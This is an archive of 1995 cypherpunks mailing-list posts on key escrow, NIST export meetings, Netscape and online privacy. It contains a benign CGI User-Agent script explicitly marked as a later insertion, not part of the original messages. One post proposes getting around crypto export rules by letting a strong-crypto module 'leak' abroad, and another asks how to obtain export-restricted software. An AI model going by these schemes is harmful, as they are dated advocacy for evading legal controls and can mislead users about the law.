   work together more closely to protect the integrity of the global
   banking system. Japan's Ministry of Finance drew heavy criticism in
   the Daiwa case for waiting six weeks before informing U.S. regulators
   about Daiwa's losses last summer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 5 Dec 95 20:10:33 PST
To: perry@piermont.com
Subject: Re: hack microsoft?
In-Reply-To: <199512060316.WAA10681@jekyll.piermont.com>
Message-ID: <199512060406.UAA23330@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Yes, I sent email, but haven't received anything back from
these people.

> 
> 
> So, are the folks that broke the Microsoft password stupidity getting
> "Hack Microsoft" T shirts?
> 
> .pm
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyal Collins <lyalc@ozemail.com.au>
Date: Tue, 5 Dec 95 02:52:00 PST
To: Andy Brown <a.brown@nexor.co.uk>
Subject: Re: bulk RC4 brute forcing
In-Reply-To: <199512030356.OAA17497@oznet02.ozemail.com.au>
Message-ID: <30C51EF5.5FBB@ozemail.com.au>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3936.1071713528.multipart/mixed"

--Boundary..3936.1071713528.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Following requests for this test code, the attached should compile and
run the tests I described earlier.
It is messy - sorry.
lyal
-- All mistakes in this message belong to me - you should not use 
them!


--Boundary..3936.1071713528.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "RC4M.C"

--Boundary..3936.1071713528.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 5 Dec 95 11:52:12 PST
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Nutscapify (was Re: Getting a copy of the Jim Clark speech)
In-Reply-To: <199512010343.VAA26254@snoopy.vetmed.auburn.edu>
Message-ID: <9512051952.AA00212@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


It's been around for ages, see 
http://agent2.lycos.com:8001/tools/nutscape/

Frank Stuart writes:
[...]
 > I'm working on an "obnoxify" program to convert normal html documents into
 > documents that look normal to non-netscape browsers, but are too painful to
 > read with netscape
 > (</BLINK>, <FONT SIZE=1>, etc.).  I think tomorrow evening
 > would be a good time to decide whether or not to distribute it.
regards dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Tue, 5 Dec 95 20:01:51 PST
To: "'cypherpunks@toad.com>
Subject: Secret Clearance (was: re: NIST GAK export meeting, sv)
Message-ID: <01BAC365.EB89CDA0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm definitely opposed to GAK, but the conspiracy theory approach to
considering what it means to employ people with SECRET clearance
may be getting a bit paranoid.

From working at an organization that did a lot of government work,
my understanding of the process of clearing employees is this:

-certain tasks require knowledge or access that must be restricted
-you have to have a high degree of trust in the people doing those tasks
-people with money troubles, out-of-control addictions, skeletons in the
 closet, and histories of "troubles" are prime targets for subversion
-doing a clearance check (in theory) eliminates the possibility that
 these people will be blackmailed/bribed into revealing their secrets

Not that this stuff always works in practice, considering that Aldrich
Ames was an alcoholic with money troubles who then turned up 
with a lavish lifestyle, and no one he worked with noticed until it was
pretty much too late.

The point is, if you want to keep your organization's systems secure,
you need some mechanism to do so. Security clearance is one way;
banks and other financial institutions do other things (like fingerprints,
background checks, etc.)

My big question is, do any of the companies providing Internet services,
or Internet software, or digital commerce services/software, employ
any of these security mechanisms on their employees? Comments or
(preferably) references to actual practices?

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 5 Dec 95 20:19:21 PST
To: cypherpunks@toad.com
Subject: Re: No Privacy Right on "My" Desktop ?
In-Reply-To: <Pine.BSD.3.91.951205025944.29416B-100000@ahcbsd1.ovnet.com>
Message-ID: <uq3NFD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"James M. Cobb" <jcobb@ahcbsd1.ovnet.com> writes:
...
> Of course companies may try another tack: Oracle's "internet
> terminal."
>
> As dlv@bwalk.dm.com pointed out in his 11 18 95 post,
>
>  [I guess, they mean no permanent storage or software other
>  than the browser in ROM. No remembered state, no viruses
>  ... -DV]
>
> In "my" terminal.

James, I do hope I haven't given you the impression that I *like* the
proposed $500 "Internet appliance". These gizmos with no local permanent
storage are antithetical to privacy. If you use it just to browse the
Web, then your hotlist, history, et al would be kept at the ISP's. Most
ISP's are greedy scum who wouldn't hesitate to sell this info to
database maintainers. E.g., someone who accesses a Web page dealing with
asthma might later receive unsolicited e-mail from a company selling
asthma medicine, or even be turned down for employment because the
medical insurance rates would jump based on his history of accessing an
asthma-related Web page. Of course, this might happen when a regular PC
is used to run a browser, but the "NC" would provide much more
opportunity for such data collection, and little or no possibility to
enhance the device with encryption / anonymity.

Still, I predict that quite a few people will buy these things when they
become available: those whose disposable income can accommodate a $500
NC, but not a $1000 PC; those unwilling to feed/care for a real PC, and
only interested in browsing the net; whatever (let Oracle's marketing
people identify their potential customers). No one knows if they'll sell
enough to make money for their makers. I heard that currently one can
buy add-ons to the Philips CD-interactive and to the Nintendo/SGI game
machine to turn them into Web browsers. I presume they sell.

What I said was, someone selling an add-on product for the "NC"
providing some degree of privacy (a PGP ROM on the PCMCIA port??) might
make a quick buck. I'm not entrepreneurial enough to try it myself.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Tue, 5 Dec 95 12:52:23 PST
To: bryce@colorado.edu
Subject: Re: The Newspaper sez J.Clark sez "Uncle Sam Needed for Net Security"
In-Reply-To: <199512052001.NAA20742@taussky.cs.colorado.edu>
Message-ID: <m0tN4GW-0002e4C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Bryce" == Bryce  <wilcoxb@taussky.cs.colorado.edu> writes:

    Bryce>           To secure Net communications, the government will
    Bryce> need to have access to private data exchanges using what is
    Bryce> known as a key escrow security system, said Clark. He added

Who was the guy who asked why "we" are mad at netscape? Well, I am
because of exactly this blatant lie.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Tue, 5 Dec 95 11:46:37 PST
To: cypherpunks@toad.com
Subject: Apache-SSL for export
Message-ID: <Pine.SOL.3.91.951205214241.1372B-100000@sun.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



Are the SSL patches for Apache available somewhere else than in USA or UK?

You know I am a big security risk for those countries as I live in 
Estonia, so it is not allowed for me to get apache-ssl legally. Good old 
COCOM restrictions, the poor guys in Great Britain have not heard the 
world has changed.

So can anyone suggest how to get the software? Ftp, fsp, http, e-mail, 
anything will do.

Juri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 5 Dec 95 12:51:34 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512052052.VAA02122@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cactus@hks.net (Leslie Todd Masco) wrote:
>In article <199512050326.VAA30525@khijol>, Ed Carp <ecarp@netcom.com> wrote:
>>That's one of the most politically and socially naive statements I've
>>ever heard.  Corporations *never* do the "right thing" unless it will
>>increase their profits.
>
>I just *love* hearing statements like this from people who have probably
>never started their own businesses.

Perhaps they've worked for a corporation? :-)

>Corporations are no more or less than their component people.  If the people
>running a corporation care about an issue, the corporation will act upon
>it  -- bounded by the interaction of their survival instinct with their
>assessment of reality.  How could it be otherwise?

Certainly. In many organizations, the people who set policy, and the people
who "run" the corporation are not the same. Often important managers
disagree on issues or on how to achieve them. Individuals within the company
are often focused more on their careers and position within the company,
than on the effect their decisions have outside the company.

To equate an organization, especially a large one, with its constituent
parts ensures that you will be continually surprised by its complex and
unpredictable behavior.

BTW, the crypto relevance of this thread is nil.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 5 Dec 95 12:52:32 PST
To: Herb Sutter <herbs@interlog.com>
Subject: Re: [NOISE] Barring access to Netscape
In-Reply-To: <199512012041.PAA29577@gold.interlog.com>
Message-ID: <9512052052.AA00507@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Herb Sutter writes:
 > At 14:26 12.01.1995 -0500, Robert A. Rosenberg wrote:
 > >If you want to see one way of locking out Netscape users, check out this
 > >URL which points at a Web Page that will not allow access by Netscape Users
[...]
 > JeffW: Please add a configuration option to let users override the "Mozilla"
 > ident, so that they can continue to use Netscape at all sites.  I personally
 > won't use the override, though; if a site is going to insist on trying to
 > frivolously exclude me as a user based on nothing but the browser I choose to
 > use, they aren't serious anyway.
You can use my anonymous proxy which strips off all 'personal'
information, including User-Agent: ...
While I let Mozillas access it :-)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 5 Dec 95 21:59:51 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
Message-ID: <199512060554.VAA05768@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



David Lesher <netcomsv.netcom.com!nrk.com!wb8foz> said:

> Attendance was roughly 20% (yes, one fifth) of September.

> ISTM industry is tired of hearing the same words in a different order.


I thought that this would happen, immediately on reading that there was
going to be this meeting.  From Pat and John Young's reports on the previous
meeting, it was almost a revolt; almost everyone in attendance thought that
the proposals were completely wrongheaded.  Yet, it was announced that
this meeting would be happening.  Very quickly a new set of criteria were
announced that made it clear that the input from the last meeting was
completely, systematically, and with no apology whatsoever, ignored.
All the intelligent complaints from intelligent people that cared and thought
a lot about the issue could just as well not have been said.

So, why go to the next meeting?  Many people have apparently decided not to.
Nothing can demoralize somebody more than making good points, telling
arguments, that are then ignored.  I would have thought at this meeting
there would have been a majority of pro-GAK people, to affirm the mandate
that was being presented.  Apparently this did not happen, although I'm
desperately waiting for more reports from this meeting as to exactly what
did happen.

It's not completely true that the efforts of the previous meeting had no
effect, there was one: that the breakout meetings where the major shouting
took place were eliminated from this meeting.  I think that this was an
error on the Govt's part, it worked so well the last time.  I'm sure that
by the next meeting, or the one after that, or if necessary the one after
that, they will have finally come to the point where they can say that
there was unanimous enthusiastic acceptance of the GAK criteria, so why
not extend it to domestic use as well?

thad

who is deeply grateful to the East-Coast group for showing up and making
noise
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Tue, 5 Dec 95 18:56:14 PST
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: CFP '96
Message-ID: <Pine.A32.3.91.951205215612.23874A-100000@VIPER.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'm going to CFP '96 and was wondering if any cpunks wanted to share a 
hotel room with me (or even better, offer me crash space on the floor).

If so, mail me and we'll work something out.

And now back to your regularly scheduled rants and GAK'ing.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 5 Dec 95 19:15:16 PST
To: sameer@c2.org
Subject: hack microsoft?
Message-ID: <199512060316.WAA10681@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



So, are the folks that broke the Microsoft password stupidity getting
"Hack Microsoft" T shirts?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 5 Dec 95 20:18:13 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
In-Reply-To: <64158.pfarrell@netcom.com>
Message-ID: <199512060421.WAA06668@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


Thanks for the great summary, Pat.

> His concern is not that smart people can have stronger crypto, but that
> strong crypto will be easy and widely used. 

This is why the 4 horsemen arguments aren't very convincing.

We often tend to view things in fairly black and white terms:  either we
have privacy or we don't.  But even with strong crypto, most people won't 
have security because they'll screw it up.  (Anyone who has ever been in 
charge of creating accounts for other people knows what kinds of 
passphrases people will pick.)  And even the most conscientious among us 
are still going to be vulnerable to physical attacks on our hardware or 
more exotic attacks like tempest.

The real questions here are (a) how easy will it be to automate
surveillance, and (b) how much is surveillance going to cost, not (c) is
surveillance going to be possible at all?

No matter what happens with the law, determined people will be able to 
protect their privacy fairly well.  And no matter how strong the tools 
are, the government will very often be able to penetrate the defenses 
by physically tampering with a machine, getting one correspondent to sell 
out another, or whatever.

Without crypto, the price of surveillance is going to drop through the
floor.  It's a lot easier to filter email for suspicious key words than it
is to analyse voice traffic on the telephone.  But with crypto, the price 
of surveillance is going to go way up.  Sticking with the status quo 
isn't an option.

I'd feel a lot better if surveillance became more expensive.  I don't have
much faith in our legal protections against government surveillance. 
Sure, they can't introduce evidence into court if it was obtained with an
illegal wiretap.  But if they learn something interesting, they can trump
up an "anonymous tipster" and get a court order.  Who's watching the
watchdogs to make sure they're following the law?  The exclusionary rule
isn't much comfort if it depends on the police admitting that they
violated my rights.  But how else would I know about an illegal government
wiretap? 

How much surveillance is really taking place?  Who knows.  I do know that
if it becomes 10 or 100 times more expensive than it is now, there will 
probably be a lot less of it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 6 Dec 95 22:28:45 PST
To: Jeff Weinstein <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512070629.WAA07401@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:14 AM 12/6/95 -0800, Jeff Weinstein wrote:
>  Our representative at the NIST meeting said [GAK is evil] there today.
> It should be up on the web site in a few days when he gets
> back from DC.

Dang, I was just working on my "death to netscape" page before 
I started reading my mail.  I had done the text, and was going
to start stripping background out of the dirty pictures, so that
my server would not drop to its knees.  The text is visible when
viewed in netscape, but the pictures are not.

Should have done the fun part first.

Let us know when the position is put on the web.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: McGrath <st954a65@dunx1.ocs.drexel.edu>
Date: Tue, 5 Dec 95 19:37:21 PST
To: cypherpunks@toad.com
Subject: <no subject>
Message-ID: <30C5105C.408F@post.drexel.edu>
MIME-Version: 1.0
Content-Type: text/plain


is this a mailing list or something if it is send it
st954a65@post.drexel.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Tue, 5 Dec 95 03:40:16 PST
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <199512010549.VAA27874@blob.best.net>
Message-ID: <199512051140.WAA09692@fangorn.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Frank Stuart <fstuart@vetmed.auburn.edu>, loki@obscura.com,
  and         cypherpunks@toad.com
  and "James A. Donald" <jamesd@echeque.com>

J.A.D. wrote:
> At 09:43 PM 11/30/95 -0600, Frank Stuart wrote:
> > I'm working on an "obnoxify" program to convert 
> > normal html documents into documents that look 
...
> Is there any way one could set up a dirty pictures web
> page in such a fashion that it would be difficult, painful,
> and impractical to get at the pictures through that page
> with a netscape browser?

Well, if you can run CGI scripts, it's very easy: you simply check
the USER_AGENT field, and then send different versions. For an 
example, see

	http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/no-Mozz

You can make the script more or less drastic according to taste.


Can't *anyone* write a simple shell script any more?

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMMQvrCxV6mvvBgf5AQG1SQQA61zpMO33EuyBm9Siapk/Rg3w0KJ50BLK
52zAAn1aYo1YkfTK0uWaRyooaZRYRji7HJR5O9Fs2ss2A6JKaMZ3QFCAKdOI3M6C
aYvPtL+0/45WW++ilAjKSoCKOZhzxP79+9xxLt0dyOf0J6y3DO6gKg9GlH1ZKEpl
6/V79f4ZmeQ=
=4RLq
-----END PGP SIGNATURE-----
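
Added example (not part of the original message, and not the no-Mozz script at the URL above): a shell CGI handler that does the check Jiri describes, choosing a response from the User-Agent header, which CGI exposes as HTTP_USER_AGENT. The function names and the sample User-Agent strings in the comments are constructed for illustration.

```shell
#!/bin/sh
# CGI sketch: pick a page variant from the browser's User-Agent header.
# The web server passes that request header in $HTTP_USER_AGENT.

# classify_agent UA -> prints "mozilla", "other" or "missing".
# Order matters: clients that only imitate the Mozilla/ prefix say
# "compatible" (constructed sample: "Mozilla/1.22 (compatible; MSIE 2.0)"),
# so that pattern has to be tested before the plain prefix match.
classify_agent() {
    case "$1" in
        "")                    echo missing ;;
        Mozilla/*compatible*)  echo other ;;
        Mozilla/*)             echo mozilla ;;
        *)                     echo other ;;
    esac
}

# html_escape STRING -> STRING with HTML metacharacters encoded, so a
# client-chosen header value can be echoed into a page without adding markup.
# The ampersand is replaced first so later entities are not double-encoded.
html_escape() {
    printf '%s' "$1" | sed -e 's/&/\&amp;/g' \
                           -e 's/</\&lt;/g' \
                           -e 's/>/\&gt;/g' \
                           -e 's/"/\&quot;/g'
}

# render_page UA -> complete CGI response: headers, blank line, body.
render_page() {
    ua=$1
    kind=$(classify_agent "$ua")
    printf 'Content-Type: text/html\r\n'
    printf '\r\n'
    case "$kind" in
        mozilla)
            printf '<p>Text-only page served to %s</p>\n' "$(html_escape "$ua")"
            ;;
        *)
            # A missing header is treated like any other browser.
            printf '<p>Full page</p>\n'
            ;;
    esac
}

# Entry point when the web server runs this file as a CGI program.
render_page "${HTTP_USER_AGENT:-}"
```

The header is supplied by the client, so the check selects a presentation only and is not an access control; whatever is echoed back from it is escaped first.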




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 5 Dec 95 13:47:13 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: French crypto restrictions - update ?
In-Reply-To: <199512020701.XAA01919@ammodump.mcom.com>
Message-ID: <9512052148.AA00712@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



Yes Netscape got the authorisation to sell Netscape navigator in
France (40 bits) but there are no policy changes or whatever, it is
still a tedious product by product process to get auth for crypto and
obviously, you aren't going to get an auth for PGP any real soon... :-(


futplex@pseudonym.com writes:
 > Sorry, this has nothing to do with Netscape's position on GAK:
 >
 > Jim Clark writes (via Jeff Weinstein):
 > > Until recently, France did not even
 > > allow us to sell products with 40-bit keys, much less 128-bit keys.
 >
 > I'm curious about this. Were Chirac et compagnie simply dragging their feet
 > on granting a license, have they made an actual policy change, or did they
 > realize they could do what Damien did ? It would be interesting to see more
 > information on this development. (There's a paranoid conspiracy theory I
 > could add to the pile here, but I don't believe it and we seem to be knee-deep
 > in them at the moment....)
 >
 > -Futplex <futplex@pseudonym.com>
 > Let's wait and see
 >


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

cryptographic assassination PGP Peking explosion security SDI




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 5 Dec 95 13:51:07 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: prototype slot-machine
In-Reply-To: <199512030850.AAA03618@ix3.ix.netcom.com>
Message-ID: <9512052151.AA00725@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



You can play as low as $0.5 on my pseudo slot machine, cyberbucks only
(legal issues). Nice graphics and *feedback* (unlike most shop
software) but sorry, no sound yet :-)

 http://www.box.eu.org/~dl/inc/play.shtml

ps: 1 you can win up to $70
    2 sorry if it sounds like an ad, but the Q was to be answered...

Bill Stewart writes:
 > At 10:23 PM 12/2/95 -0800, sameer wrote:
 > >	I've written up a slot-machine thing for ecash, very
 > >experimental, very buggy, not very slick, (i'd like to get the
 > >technical bugs worked out before i put a fancy wrapper on it) and i'd
 > >*like* to announce it here for testing, but I'm worrying about
 > >gambling laws.. 
 > >	any thoughts?
 > Use the demo digicash; it's not real money, and it's never been
 > illegal to play for poker chips.  The mere fact that there's an exchange
 > market for real money vs. digicash play money doesn't change that.  
 > It'd be nice if you take small bets, since many of us only have $100
 > or so of play money; quarters should be fine.
 > To do the job right, you need audio....

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

GIA jihad North Korea FBI Clinton supercomputer Cocaine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Tue, 5 Dec 95 23:03:56 PST
To: cypherpunks@toad.com
Subject: Solution for US/Foreign Software?
Message-ID: <m0tNDk3-000905C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Manufacturers of handheld ham radios have to make them for at least three markets:  Japan, US, and Europe.  Since these devices are usually based on the same LSI chip for control, customization is usually done by installing/not installing certain tiny surface-mount devices (diodes?) on the PC board, which tells the "boss MOS" which frequency band edges to work with, etc.

Getting these radios to receive or transmit "out of band" is usually a simple matter of modifying these radios by adding/removing/moving these diodes to a different position.  The instructions on how to do this custom operation are not included with the radio itself, but the information always seems to get out there, and you can buy books which show the mods for practically every such radio in existence.

Okay, the problem as I see it is that USG doesn't want to approve encryption software for export that can use "excessively long" keys, yet Netscape (and others) want to be able to sell outside the country with full-feature encryption.  I think I have a solution.

1.  Write a program with limited encryption (40 bit?), with the encryption module in a file external to the  main program.
2.  Get export approval for this program.
3.  Write a module which replaces the encryption file, increasing key size to whatever you REALLY wanted in the first place.  (128-bit IDEA, 2000-bit PGP, etc.)
4.  Ship that new module with the old software to US customers.  Naturally, that new module will "leak," so anybody who buys the old program out of the country can convert to a fully-functional version by downloading it from a foreign bbs that just happens to have it.  The module can be encrypted/signed by the manufacturer so everyone can be sure of its identity and genuineness.


Better than nothing, I suppose.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Tue, 5 Dec 95 23:24:19 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: The "Future" Fallacy
Message-ID: <9512060724.AA13231@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Duncan Frissell 

Bill Gates (like Mister Newt before him) committed what I call the Future
Fallacy in "The Road Ahead."  Page 106.

"Soon any child old enough to use a computer will be able to transmit coded
messages that no government on earth will find easy to decipher."
...................................................


Billg is an optimist.

What's wrong with this picture, Duncan?

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Tue, 5 Dec 95 23:23:12 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: Info on Netscape's key escrow position
Message-ID: <9512060724.AA13235@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "James M. Cobb"  
 
Blanc, 
  
On 12 02 95 you pointed to: 
 
   ...an underlying problem, which is of not having a sense 
   of freedom to stand up to the Dark Side. 
 
 You have put your finger on perhaps THE problem: Why did 
we cast aside our sense of freedom?  How may we re-ignite 
the spirit of freedom? 
.........................................................

Yes, I think it's a pretty important element to ponder, this lack of the sense 
of freedom.  I don't think that "we" all (especially on this list!) have cast 
it aside.  

I do notice that it seems to dissipate the closer that one gets to govmt 
agencies (or vice versa).  I have often heard people say "well, if it becomes a 
law, we'll have to uphold it".  That seems to be the end of all effort towards 
reality, as though no further advancements toward truth were possible.  It's a 
continual problem, fostered from being in the lower rungs of the pecking order 
of "authority" and then beginning to think that one rightly belongs there.

Yet how often, especially lately, does technological progress make obsolete 
what yesterday was an "important" social/political issue requiring "official 
intervention" from higher authorities to impose the lowest standards of 
functioning so that everyone could "get along".

Sometimes the issue just goes away from atrophy or obsolescence, once certain 
talented individuals discover new, improved ways of getting things done.  Of 
course, there's still always another social fear to overcome, and the more that 
inventors & scientists & technologists push back the envelope of what is 
possible (especially in the field of electronics & communication), the closer 
they get to the gist of the problem with people's attitudes & behavior toward 
each other, and the closer also to the governing agencies which were created to 
deal with these concerns.
 
Some things I know which inspire the sense of freedom to stand up to the Dark 
Side is to have definite knowledge, integrity, a personal vision of the future 
(an ideal), and some really useful tools (be they hardware or software).  

This list is intended to focus on the tools of cryptography in relation to 
privacy, James, and far-off digressions are discouraged because of the volume 
of mail which this would result in.  So do try to focus on that, won't you, or 
you'll continue to hear from Perry, who works tirelessly to keep everyone in 
line.  :>)

  ..
Blanc
 
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 5 Dec 95 20:26:05 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NIST GAK export meeting, short version
In-Reply-To: <64158.pfarrell@netcom.com>
Message-ID: <199512060426.XAA20883@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Pat Farrell writes:
> I just got back from the NIST GAK export meeting. This is
> a short writeup of a summary. 

(I should probably wait for a longer version, but what the hey...)

[...]
> (2) since the 64-bit limit was severely criticized at
> the Sept meeting, why is it still needed if there is also escrow?
[...]
> and on the 64-bit issue, that the government is "not certain it will
> work." he says they "want to see it implemented and want to see
> how it works" because 64-bit encryption is very strong. If the escrow
> doesn't work, they don't want a lot of software to be in widespread use.

This answer sounds rather silly to me. Do they seriously doubt that the
escrow mechanism works (modulo MAB's observations about the LEAF), or expect 
us to believe that they do ?  Clinton Brooks' comments cited later by Pat
suggest a certain acceptance that enforcement will have its problems
(e.g. strong crypto tunnelling), but perhaps Greiveldinger somehow doesn't
officially share that view. Is there another interpretation of "working"
I'm missing here ?

-Futplex <futplex@pseudonym.com>
"I'm from the D.O.E. and I just need to leave this here temporarily"
	(from a political cartoon entitled "The 3 Biggest Whoppers")



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 5 Dec 95 20:31:56 PST
To: pfarrell@netcom.com
Subject: Re: NIST GAK export meeting, short version
In-Reply-To: <64158.pfarrell@netcom.com>
Message-ID: <199512060427.XAA09688@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I just got back from the NIST GAK export meeting. This is
> a short writeup of a summary. I'll post a longer version later
> this evening or early tomorrow morning.

Pat did not mention the first thing I observed.

Attendance was roughly 20% (yes, one fifth) of September.

ISTM industry is tired of hearing the same words in a different order.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 22:40:37 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
Message-ID: <acea7b990d021004cc3a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:54 AM 12/6/95, Thaddeus J. Beier wrote:

>I thought that this would happen, immediately on reading that there was
>going to be this meeting.  From Pat and John Young's reports on the previous
>meeting, it was almost a revolt; almost everyone in attendance thought that
...

Man, whatever government type thought up this idea of getting "industry
input" is gonna have his head handed to him!

Democracy really sucks at times.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
